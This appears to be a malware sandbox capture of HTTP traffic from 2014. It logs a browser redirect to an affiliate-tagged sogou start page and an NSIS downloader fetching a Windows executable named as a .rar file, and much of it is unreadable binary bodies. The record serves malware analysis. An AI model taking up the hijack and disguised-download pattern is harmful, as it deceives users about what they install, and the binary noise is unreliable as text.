...s....&'......l.d...2-..~.o/J{.|.0...c;s\.i(...?\..G..>.u..x.....-R.v...........3.-.2I.f.l.........k........4kP?...e.G..6..j.... .].tUO..h.H.........I..enq.$&.}\ 3....5...Y8.8.?.la..Lv......75I.....0e..t"...Q..@L..i....!a....F..w..]..x.,.^..46w...g.......,A.%..Rqy..[e|LpV.Z..z..7WZ.fc..(7....J...So&...z....2 ..Y.V.5..:s.....l^....#.../.gH.^{;;;.8......X.=1. .3V..{$qg.ZbP..Bv..Z...... .s }.9....~..[..".E%.M.R.A....a.)..{g....B...-.....6OS...v...1T..$...V-..l.T.v...p..z.t.3.c.)...{.YU .1.~.......a........q..8...W...y.W.%..p..h.........C.z..B=....B...:..T..2...).9s..#..$..`...AoP...8..........hT.sN...`N...N....:....=g.$
<<
<<< skipped >>>
GET /jsn/hotdata.js?V=1399956570493 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Tue, 13 May 2014 03:59:57 GMT
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Fri, 16 May 2014 04:49:25 GMT
Cache-Control: max-age=259200
Content-Encoding: gzip
c63.............YkO..../D..."....^..lc.`I ..H...=..........{.z..{.....,..f.^.NUWw..<..'?Z...skz.....[..t.K.2.i.{...i3.lf;.lP...{.H..H...Ok........i..7:..>.'.Q:>k.K....g.Sq"...Mgv..._...Q.~.t~.I.}.o.A...ju>~h|<.......Y.bx.M.Nn.&.....(.?......cO.u..2Qk}.......*...N..9?..A.....?.T.z];8......................(.>z?..._.O....[...r...~.....ZZ.w..x...t...L.N6c...eg.U.f.].Y....5..T^PY..-.....J...c!....X...g.i..r.f...L....(..&.Z.C"..J.*.....b.|>..4..^sx.cC..P...F...61_{-.Z(....},.....:*.uB......dw8i......$-...]z....z...iR...s.....F.UE.(5LT..'...F..F.l.p..3..h/.B#.2.,...T!C..4...v.E.$...f..8Yh....z.UY.Z..m.kk#/#....Q-Y*...*.....Z{.....T..X..7Xy.....2?..4..u..s....|.. r..GU..<.....L.xq..f..C..J .(.p. ..}(.E.y......V..YI.Q.y.. .....^.`j.;....4....'.f...d 8N1..#]F.`6..V....................4...v{.G.9xO...~........f.^...[.......1..McP.il..R;....u.k.tI.i...\W....@...ZL.....\Q.r<. L..p..|%f]....!.n..{w?.i'...F!.....[..........*..V`.U.>..^s0..;.8H[....2."Ve....2..a..W3&n{.4 ..Q.I'.D._ .{...u....a..m.....[!..fGh.....!l.*..\..D.|.X...jJ.:.r).......|.Yw.#I....R ..9.......T{.N.9M ....JT;..::..a=....T..:........88>.......!#.g.r.t......<.@]F..>H..n.......o....G.P&.\.......!.|.%#&b{.....It.Gu.....Q.Aj..G...'TEQ.=..r.T.:...A...1~.....z.U.ly.Q.... ZdK....g....x....4.5.P.EA.H.....x.RN%A. .A..@..2....:.._....~.........Ow..5W..d.t.(....Ut.....* -....Q.s.!.......*z......V......L...^3.P=B...............9} .....dt(....4......@...N.G...bJB2..u.s.H..2....MHY....RC....:.T1....)..'y...Ce....]...#qQ....j...A#(.I
<<
<<< skipped >>>
GET /images/weather/cloudy.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; GOTO=Af22014; SUV=00461146C18AF4E75371A4556E6A4053
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1663
Connection: keep-alive
Last-Modified: Sun, 09 Oct 2011 10:21:06 GMT
ETag: "4e917592-67f"
Expires: Sun, 18 May 2014 09:22:30 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a(.(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y....................................................................................................................................................................................................................................................................!.......,....(.(........H......*\......#J.H1..t..bCa..(Q..eL(..7........H..x]..H..ff\......X.P.H....@.D.L.....R.H.4DM..gZ..9O.1.....ajT.Q..H.#F......Xa.....04. eS...z.*E....E.......?Ql...'.&*.k402...6l.D...L#(v<.2....g..)Q....W#0..!.G//q.....N.0.....Q........... 2x...........y....Z...Yx...#Sh..$....~..8.a..KY...*y....@...4....PC........q..r.".X.B.^..I.1...;.es...$....x"..q$QA.)\....X`..P.......J8.....aqp...L..!..`.1..r.......".....h.N7.}..$...C.Q......P.(<....?....t.....!.N45.B.*?...............py.$.@2...4...<!$.20P`..Pd.. Y....)..B........H............"..#..........D.Z,...E.RD 3... \,..;.T..2V`.H.. .D"L......A.!R.!B.....C]$..0[...4R.2..D..A!j...0?DAG..84.&.T1..R....6H!..eD.B..t.......-s81.......?.R./..1F...D..v....O..H#..-uB..3.=Xc....
<<
<<< skipped >>>
GET /v53/get_tj.php?hz=4666521&ids=qiche HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://123.sogou.com/?22014
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; _seCityCode2=CN110100; tjv2_cont=00_01_08_09; GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:31 GMT
Content-Type: text/javascript; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
10b3..{"qiche":[{"tab":"\u6c7d\u8f66","taburl":"http:\/\/123.sogou.com\/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic4.xcarimg.com\/img\/news_photo\/2014\/05\/12\/fIXLig2wT89333.jpg","url":"http:\/\/price.xcar.com.cn\/serise166\/city9999-1-1.htm?zoneclick=100517","title":"\u51ef\u7f8e\u745e\u21934.1\u4e07","price":""},{"picurl":"http:\/\/pic1.xcarimg.com\/img\/news_photo\/2014\/05\/12\/1oq9Gg9Y3L8813.jpg","url":"http:\/\/price.xcar.com.cn\/serise601\/city9999-1-1.htm?zoneclick=100517","title":"\u5e15\u8428\u7279\u21933.6\u4e07","price":""},{"url":"http:\/\/price.xcar.com.cn\/serise1087\/city9999-1-1.htm?zoneclick=100517","title":"\u6bd4\u4e9a\u8feaS6 \u73b0\u91d1\u4f18\u60e01\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise1608\/city9999-1-1.htm?zoneclick=100517","title":"\u65b0\u4e00\u4ee3\u8f69\u9038 \u4f18\u60e01.7\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise257\/city9999-1-1.htm?zoneclick=100517","title":"\u6bd4\u4e9a\u8feaF3 \u73b0\u91d1\u4f18\u60e01\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise1338\/city9999-1-1.htm?zoneclick=100517","title":"\u5954\u9a70GLK\u7ea7 \u8d2d\u8f66\u4f18\u60e05.5\u4e07","color":false}]},{"tab":"\u65b0\u8f66","taburl":"http:\/\/123.sogou.com\/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic5.xcarimg.com\/img\/news_photo\/2014\/05\/12\/O2xA3C6VhB1569.jpg","url":"http:\/\/price.xcar.com.cn\/serise1261\/city9999-1-1.htm?zoneclick=100518","title":"\u9038\u81f4","price":"\u964d2.6\u4e07"},{"picurl":"htt
<<
<<< skipped >>>
GET /imgu/2014/05/20140512170546_833.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p9.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 4723
Last-Modified: Mon, 12 May 2014 09:05:46 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....0..4.....2..:v...".j.2Z.=.NQ...?..{..r...FH.k..V..6t.1k].}*......Q.Gs..8?.j..".Z0...=..>'..m...}..2].........c. ..W.*>...9jBQ......H.t..n...E..7......1.9..K..G.'.3...K$..i..^......E.....MJ.S.YL.kef.7............~f....4..g.N.\ms.[....>.~..?.k...>..'..GE.x......=>.{..Ve...x.e|J...@ ..$...S.8..FV.6kB........{./...._.>(j..~#iia.h......t.A2r.2...`......tj.M{........f5..\...Y..X...Mc....2.>.....{I...U.......ZS.i.....[X....} X.Ah.`I...t....}.*..d.f..2.....i.h...V....gf.r......}..:..Q((J.3...u..^.d..t.N.Wq....JM.rH.f........K...0..x.kf.k..F.0..S.........f....g...nO....Gj.p..V.wZt:'_....<...|..4v.II..s.'5........#*.....>1|2...ii.m8B......G.......$.Dy.i....O......>.......a.....-.O.............l.....N.5.P2....I.Y.85....k....<...S......<.w.s.....'.mlu......[.K..\.)%..6.....w.Sx...c...E....k.h...{..{_~...o.........-t...F....
<<
<<< skipped >>>
GET /img/news_photo/2014/05/12/fIXLig2wT89333.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pic4.xcarimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Tue, 12 May 2015 04:00:18 GMT
Date: Mon, 12 May 2014 04:00:18 GMT
Server: Apache
Last-Modified: Mon, 12 May 2014 02:55:05 GMT
Cache-Control: max-age=31536000
Content-Type: image/jpeg
Content-Length: 5534
Accept-Ranges: bytes
Xcar-Cache-Server: imgcache2-HIT
Age: 1
X-Via: 1.1 zjjx158:80 (Cdn Cache Server V2.0), 1.1 gl25:1 (Cdn Cache Server V2.0)
Connection: keep-alive
......Exif..II*.................Ducky.......d.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:104A21BBC38311E382E2ECE6B616ED1C" xmpMM:DocumentID="xmp.did:104A21BCC38311E382E2ECE6B616ED1C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:104A21B9C38311E382E2ECE6B616ED1C" stRef:documentID="xmp.did:104A21BAC38311E382E2ECE6B616ED1C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................U._..............................................................................................!..1.Q#..A".aq.2BR.3D&......................!1..AQaq..".........2R#3............?....N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D..~..?.1.wK..d...#...9..."....3L.E..pv.pPV(.....B...0..f.....Q.1?%W9C.~.c93....y..:I......9;..m.:.S1..W'0.c......aI.3.T.....N..0^...U..I;&...S.v.{N.:/s..N.......u..9T.T..S,...R..NJw...&<?uhUe...wY..f<.`MV..4.../..
<<
<<< skipped >>>
GET /hezi/jm/setup_a7158.rar HTTP/1.0
Host: VVV.sj88.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: application/x-rar-compressed
Content-Length: 3732104
Connection: close
Last-Modified: Wed, 07 May 2014 07:50:55 GMT
X-Cache: EXPIRED
X-Cache: HIT
Accept-Ranges: bytes
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....WZR..................................... ....@.................................L=9..........@....................................................8..............................................................................................text...,........................... ..`.itext..D........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.....................................rdata..............................@..@.rsrc................ ..............@..@....................................@..@..................................................................................................................................................................@...AnsiChar............@...string(.@...AnsiString......@...............................@......... 9@.(9@..9@..9@..9@..9@..9@..9@.,8@.H8@..8@..TObject.%..A....%..A....%..A....%..A....%..A....%..A....%(.A....%..A....%$.A....%..A....%..A....%..A....%..A....%..A....%|.A....%x.A....%t.A....%p.A....%l.A....%h.A....% .A....%d.A....%`.A....%\.A....%..A....%..A....%..A....%X.A....%T.A....%..A....%..A....%..A....%P.A....%L.A....%H.A....%D.A....%@.A...S..........$D...T.J....D$,.t...\$0....D[..@..%<.A....%8.A....
<<
<<< skipped >>>
GET /img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pic1.xcarimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Tue, 12 May 2015 04:00:18 GMT
Date: Mon, 12 May 2014 04:00:18 GMT
Server: Apache
Last-Modified: Mon, 12 May 2014 02:55:16 GMT
Cache-Control: max-age=31536000
Content-Type: image/jpeg
Content-Length: 5243
Accept-Ranges: bytes
Xcar-Cache-Server: imgcache1-HIT
Age: 1
X-Via: 1.1 tzwl37:8080 (Cdn Cache Server V2.0), 1.1 gl27:1 (Cdn Cache Server V2.0)
Connection: keep-alive
......Exif..II*.................Ducky.......d.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:297A1A15C38311E387729AE07621B962" xmpMM:DocumentID="xmp.did:297A1A16C38311E387729AE07621B962"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:297A1A13C38311E387729AE07621B962" stRef:documentID="xmp.did:297A1A14C38311E387729AE07621B962"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................U._...............................................................................................!1....AQa#.R$."2Br%.......................!1.AQa...q.."..BR...$............?.............................................................03.X..5,.......d[DUy (.e...|{b....Q.P.PI..R.!.L....8C}....1.X.... .`1..i ..jR....t.p.7.......8T.a....*...........2V..:..w..?....!.s... nl.@....)..vK(.S&t}..l....A.....0.J...0...*....".....2....3(E=0 v92.>."D.;. *..Cn.....Q=..VS.D
<<
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: lvdou.300duo.com
Connection: Keep-Alive
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:49:23 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDAAQBQDRT=LPBGIBHAHMIAKLCFMNMJAIJH; path=/
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:49:23 GMT..Server: Microsoft-IIS/6.0..Location: hXXp://123.sogou.com/?22014..Content-Length: 148..Content-Type: text/html..Set-Cookie: daohang=1; path=/..Set-Cookie: ASPSESSIONIDAAQBQDRT=LPBGIBHAHMIAKLCFMNMJAIJH; path=/..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...
GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:17 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90c9................\.u/...gb!..=......`v..X........7.2....12N>6.A ....@ @...$.yy...G.;..b...~.sj.Uw..I..21..[.T..sN..N......{....$..V3...{.~p_b"9=.......O.O|....y8.I..O..v.1ht.Nsz.......`.]..^[[K..R.^m..'......,?&......2.|?...]..|..1h..W>:}..g.N.<..........W~.......y..L.;..O3.\...u..r.u..x...;p0.A7...6V.&..|zOr_..u..R..H.;....,M<x`.@k.t....f'.................`...X.;..;X..V0.........w}......0.)=.)5...?...............s.....N......n....v..............g.....3ZN.....}...M..t......8y..o..z.....x..H?{s.c...r...u....U..............{.....o.A.{.....#....^.y....^?v........}..K.~|...?<.W....[.....7....O....s?....?...g..._...7....4HB..?|.o...............;......n....c..$...J..6.&.X..D..V.&..-......*....&...[.y<.....8}4.....hI...x..;......U.....K.....B.]K...........-|.Z\k. ...j!..^..Z..|....C.j.....?....u3....K..*)M8.J..~z.iO.. ..t......Xr.. .?..b:.N.9.V..:...Z_..`N.....'Um..y_........8ht...}..CZ5R..f).Y5.-..1.!.V...V..V-....~5lo._:.. ...%.@.`........&.K....35lN5.S..T.......zv....N...j...j....T.m...T..e....*..Je.mm..^..^Hw..v.J.....-'...%........-g..ivz...*.-..' n...Bv.....Yn.No.......D...l..I...Y.6;.`..V.[.l.e_&A3..}...{.Z}...zne.I...I..Q.W<..\.....B.....s..-J.. ...[...P......0..Eh.,9..Z.._.&....59.v.Q...,......,....Uwq#..r....V!..........4HL|m...T...V.m.5*..B&.......G{k..*...2%..A.....M.;.F%1Y...bW..)..p`.f.....z......j>.).?i..#..3.t 4h..3.....K... 6y2.E.E.?.......09(.M...@..a..RkT..C.-..V.....;...~7..O ...j.;._i.s)..oW..I..........>...F..t..J.NyE""W0.M8..H?x..&A.O..e.4......1.,.h..a.........M...
<<
<<< skipped >>>
GET //v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=0
e02..sg_wt_cb({"cn":["110100","北京"],"wt7":[["2014-05-13",2,"多云","cloudy.gif",17,30,"北风 3-4级"],["2014-05-14",3,"晴转多云","fine_cloudy.gif",10,24,"北风 3-4级"],["2014-05-15",4,"晴转多云","fine_cloudy.gif",16,29,"微风"],["2014-05-16",5,"晴转多云","fine_cloudy.gif",18,29,"微风"],["2014-05-17",6,"阴","cloudy.gif",15,25,"微风"],["2014-05-18",0,"阴转多云","cloudy.gif",14,24,"微风"],["2014-05-19",1,"多云","cloudy.gif",16,27,"微风"]],"city":"CN110100","ip":"193.138.244.231","md":"05-13","week":"2","nongli":"四月十五","tuanmv":"","pm":138});tjv2_cb({"tj_utag":"00_01_08","data":{"news":[{"tab":"\u5934\u6761","taburl":"http:\/\/123.sogou.com\/xinwen\/","list":[{"title":"\u7f51\u6c11\u5728\u5883\u5916\u7f51\u7ad9\u62b9\u9ed1\u4e2d\u56fd\u88ab\u5211\u62d8","picurl":0,"url":"http:\/\/news.sohu.com\/20140513\/n399470242.shtml?pvid=7d0a16e31613c9e0","color":false},{"title":"\u8700\u516c\u4ea4\u7206\u71c3\u7cfb\u4eba\u4e3a\u7eb5\u706b\u5acc\u72af\u88ab\u70e7\u6b7b","picurl":0,"url":"http:\/\/news.sohu.com\/20140513\/n399470183.shtml?pvid=7d0a16e31613c9e0","color":false},{"title":"\u4e4c\u514b\u51702\u5dde\u5ba3\u5e03\u6210\u4e3a\u72ec\u7acb\u4e3b\u6743\u56fd\u5bb6","picurl":0,"url":"http:\/\/news.qq.com\/a\/20140513\/000421.htm","color":"red"},{"title":"\u4e60\u8fd1\u
<<
<<< skipped >>>
GET /images/weather/fine_cloudy.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; GOTO=Af22014; SUV=00461146C18AF4E75371A4556E6A4053
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1751
Connection: keep-alive
Last-Modified: Sun, 09 Oct 2011 10:21:05 GMT
ETag: "4e917591-6d7"
Expires: Sun, 18 May 2014 09:22:34 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a(.(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0..[..m..............D....................$.............................'..=..O..]..k..6..M..w..............C..Y....................h.................Q..u..............J..Y..q.............................q.................................!.......,....(.(........H......*\....D..E..(."......I.%..6}..(.F..6e.$J..h.......&M&O....S.w....6...w.@......J..Q..J.UU.X.R....M..&.I...U.b.Z....U..........>."g.T,T.f..% .-_.\.".-.... A.....Y.R.*Fl..f...j....P.0>.T...X.s......e...;......0v.....Z.HE.....|........v.H6L...8S.........}<..)....i..i.%..#H....E.X1k...N.PxQB._.@.>. c.(.4......K,.0..3.....J....B(.....S.6...."p...,.(.M7..s..T, ..R|@B.4..b-.@..#.............C..H.........T..#.(..'..3. ..#..$....At.E.(.`..9...<.....t...-..S..U..@.S....(HQ...p....8.."..../........@...H@.K.....6...;....$....:..0A..D`..R. ..)l..." a..5...?.(.J4..!..2\..... ...x....L...Y......y."...O.0(@..C.!E..t....4Q....pB.-.....`.-B...C...Q..]....S,...K....?....,...8...B.W(`..$..F.%|0..JLpB.A....O..2.....=5..@.
<<
<<< skipped >>>
GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; _seCityCode2=CN110100; tjv2_cont=00_01_08_09; GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:35 GMT
Content-Type: image/x-icon
Content-Length: 1150
Connection: keep-alive
Last-Modified: Wed, 21 Sep 2011 09:58:33 GMT
ETag: "4e79b549-47e"
Expires: Sun, 18 May 2014 09:22:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
............ .h.......(....... ..... .....@...................................ddd.aaa.___.]]].[[[.XXX.VVV.UUU.............................iiif............................VVV.UUUl....................}}}.....................................fff.UUU................o..........v..t...q..........................bbb.UUUQ....xxx...........F..o...............y............A.........VVV.UUU....v.........b...{...........}....!............... .....~~~.VVVT.........r#..o...w...v...h....E..................w..........XXX..........W...q...h...y(...............................U.....[[[..........X...g....E..........................y......../.....]]]..........g...[........................v..p............G.....___...........P..l...................b...o...~.......y..........aaa..............^...............X...s...x...|...|...n..........ddd-.............................T...l...o...m...b..........~~~......................................{6..o ...Z.............kkk.........................................................qqq............................&........................... ................................................................................HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:35 GMT..Content-Type: image/x-icon..Content-Length: 1150..Connection: keep-alive..Last-Modified: Wed, 21 Sep 2011 09:58:33 GMT..ETag: "4e79b549-47e"..Expires: Sun, 18 May 2014 09:22:29 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes.............. .h.......(....... ..... .....@...................................ddd
<<
<<< skipped >>>
GET /imgn/tips/lk_jumei.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/png
Content-Length: 731
Last-Modified: Thu, 28 Feb 2013 09:01:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...6...).............tEXtSoftware.Adobe ImageReadyq.e<...}IDATx.b<.2....3`., .6........@.$#...&..@.@....................A.1.;..v.....w-.s`....@......X.cR.bb ......?R4.m......$..v.....H...@.......7Ab.@/. 4...D.&`..'Y.C.|..5.".n.A.....KX.g'......KF$.3R.(c.K..&...6zZ.@W.@.XE......!]|vGJ%.......F`........gtO .j..!|....L.{..J...B.AN....,:...9r......,..Tx...z....N...Q.......0..........yr.>.......5.r.a.....]..>./..W2@.)...=..F-.k..g.hb....6........... .z0@.:.*.@y./@.!7x`...E......P..._c.~|.K`?X....u..%.!.)pr.....A......&...Xa~.n...rq.c..#.cQbr...c......hZ....h...S..]j....S...v%..i.Y.o...E..8......}.AG...=..T..\...V...Rx.=.j.~..."9.".....F=62=......... [.011...O........ .......GpA1...$Pu.......7.W.%x.....IEND.B`.HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:25 GMT..Content-Type: image/png..Content-Length: 731..Last-Modified: Thu, 28 Feb 2013 09:01:24 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:25 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes...PNG........IHDR...6...).............tEXtSoftware.Adobe ImageReadyq.e<...}IDATx.b<.2....3`., 